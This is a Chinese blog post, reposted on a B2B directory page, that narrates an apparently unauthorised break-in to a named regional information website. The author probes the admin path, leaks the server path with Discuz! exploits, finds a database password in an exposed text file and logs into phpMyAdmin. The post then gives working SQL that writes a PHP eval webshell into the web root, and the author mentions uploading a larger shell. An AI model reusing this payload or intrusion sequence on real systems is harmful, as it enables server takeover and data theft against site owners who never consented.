安全检测宜昌信息服务网_韦江代心情博客_百度空间企业库|免费b2b网站

安全检测宜昌信息服务网_韦江代心情博客_百度空间

地址栏输入了网址

出于本能反应，随即在地址后加上了admin，打开，标题烂提示了是PhpCMS 2007

随便试了试弱口令，都失败了。我也就放弃了。
继续逛，发现有论坛， Discuz! 7.2的。百度了下，拿了几个0day试了试，爆出了网站的物理路径

现在有了网站路径，大致思路就是备份导出木马。PHP的程序一般都是用Phpmyadmin在管理数据库的，我随手在网站地址后加上了phpmyadmin，没想到居然打开了

不过我手上没有密码，哎，这个时候陷入僵局了。这个时候不知道怎么下手，于是拿出了扫描器，对网站进行彻底的扫描，看看有没有什么利用信息。一支烟的功夫，扫描完毕了，我发现phpmyadmin目录下面居然有一个名叫mysql.txt的文本，赶紧打开。

今天真是人品大爆发，居然扫到了数据库密码，不过还不知道对不对呢，赶紧拿着密码去phpmyadmin登录。居然成功了，哈哈。

有了Phpmyadmin，手里又有网站的路径，于是赶紧导出小马，代码如下：
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'E:\wwwroot\ycvip\wwwroot\1.php';
Drop TABLE IF EXISTS a;
执行后，在网站根目录生成了一句话木马1.php。

{zh1}上传大马。

郑重声明：资讯【安全检测宜昌信息服务网_韦江代心情博客_百度空间】由发布，版权归原作者及其所在单位，其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实，请读者仅作参考，并请自行核实相关内容。若本文有侵犯到您的版权，请你提供相关证明及申请并与我们联系（qiyeku # qq.com）或【在线投诉】，我们审核后将会尽快处理。

—— 相关资讯 ——